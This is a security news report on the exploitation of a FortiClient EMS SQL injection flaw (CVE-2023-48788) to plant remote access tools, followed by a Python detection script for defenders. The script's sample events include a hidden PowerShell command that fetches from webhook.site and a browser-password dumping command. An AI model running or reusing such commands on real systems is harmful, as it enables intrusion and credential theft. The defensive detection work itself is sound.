Hackers Exploiting Critical Fortinet EMS Vulnerability to Deploy Remote Access Tools


A now-patched critical security flaw impacting Fortinet FortiClient EMS is being exploited by malicious actors as part of a cyber campaign that installed remote desktop software such as AnyDesk and ScreenConnect.

Vulnerability Details: The vulnerability in question is CVE-2023-48788 (CVSS score: 9.3), an SQL injection bug that allows attackers to execute unauthorized code or commands by sending specially crafted data packets.

Incident Overview: Russian cybersecurity firm Kaspersky reported that the October 2024 attack targeted an unnamed company’s Windows server that was exposed to the internet with two open ports associated with FortiClient EMS. “The targeted company employs this technology to allow employees to download specific policies to their corporate devices, granting them secure access to the Fortinet VPN,” the analysis stated.

Attack Progression: Further analysis revealed that the threat actors exploited CVE-2023-48788 as an initial access vector, subsequently deploying a ScreenConnect executable for remote access to the compromised host. “After the initial installation, the attackers began to upload additional payloads to the compromised system, starting discovery and lateral movement activities, such as enumerating network resources, trying to obtain credentials, performing defense evasion techniques, and generating further persistence via the AnyDesk remote control tool,” Kaspersky explained.

Tools Used in the Attack

• webbrowserpassview.exe: A password recovery tool that reveals passwords stored in Internet Explorer (version 4.0 – 11.0), Mozilla Firefox (all versions), Google Chrome, Safari, and Opera.
• Mimikatz: A well-known tool for post-exploitation.
• netpass64.exe: A password recovery tool.
• netscan.exe: A network scanner.

Geographic Impact: The threat actors behind the campaign targeted various companies across Brazil, Croatia, France, India, Indonesia, Mongolia, Namibia, Peru, Spain, Switzerland, Turkey, and the U.A.E., using different ScreenConnect subdomains (e.g., infinity.screenconnect[.]com).

Continued Exploitation: Kaspersky detected further attempts to weaponize CVE-2023-48788 on October 23, 2024, this time to execute a PowerShell script hosted on a webhook[.]site domain; the script collected responses from vulnerable targets during a scan for systems susceptible to the flaw.

Previous Similar Incidents: The disclosure follows more than eight months after cybersecurity company Forescout uncovered a similar campaign involving the exploitation of CVE-2023-48788 to deliver ScreenConnect and Metasploit Powerfun payloads. “The analysis of this incident helped us to establish that the techniques currently used by the attackers to deploy remote access tools are constantly being updated and growing in complexity,” the researchers noted.
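For defenders, the indicators in this write-up (the named tools, attacker-chosen ScreenConnect subdomains, and a PowerShell stager reaching webhook.site) translate directly into process-creation detection rules. The following is an added example, not code from Kaspersky or Fortinet; the event records are constructed and mimic a typical Sysmon or EDR process-creation log, and the webhook.site URL path is a placeholder.

```python
import re
from typing import Dict, List, Tuple

# Executables named in the incident write-up (matched case-insensitively on basename).
KNOWN_TOOLS = {"webbrowserpassview.exe", "mimikatz.exe", "netpass64.exe",
               "netscan.exe", "anydesk.exe"}
# Infrastructure patterns from the write-up: per-campaign ScreenConnect
# subdomains (e.g. infinity.screenconnect.com) and a stager on webhook.site.
SCREENCONNECT_RE = re.compile(r"\b[a-z0-9-]+\.screenconnect\.com\b")
WEBHOOK_RE = re.compile(r"\bwebhook\.site\b")

def classify_event(event: Dict[str, str]) -> List[str]:
    """Return the reasons a process-creation event matches this campaign (empty if none)."""
    reasons: List[str] = []
    image = event.get("image", "").lower().replace("/", "\\").rsplit("\\", 1)[-1]
    cmdline = event.get("cmdline", "").lower()
    if image in KNOWN_TOOLS:
        reasons.append(f"known tool from the incident: {image}")
    if SCREENCONNECT_RE.search(cmdline):
        reasons.append("ScreenConnect client pointed at an external subdomain")
    if image in ("powershell.exe", "pwsh.exe") and WEBHOOK_RE.search(cmdline):
        reasons.append("PowerShell fetching content from webhook.site")
    return reasons

def triage(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run classify_event over a batch and return (index, reasons) for hits only."""
    return [(i, r) for i, e in enumerate(events) if (r := classify_event(e))]

# Constructed sample events (not from the incident); one benign service, one
# ScreenConnect client, one credential-dumping tool, one stager, one browser.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"image": r"C:\ProgramData\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "cmdline": "ScreenConnect.ClientService.exe ?h=infinity.screenconnect.com&p=443"},
    {"image": r"C:\Users\Public\webbrowserpassview.exe",
     "cmdline": "webbrowserpassview.exe /stext out.txt"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "iwr https://webhook.site/PLACEHOLDER-ID"'},
    {"image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "cmdline": "firefox.exe"},
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["image"], "->", "; ".join(reasons))
```

In production the ScreenConnect rule should be scoped to hosts where that product is not sanctioned, and the tool-name rule paired with hash or signer checks, since renaming the binary defeats a basename match.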
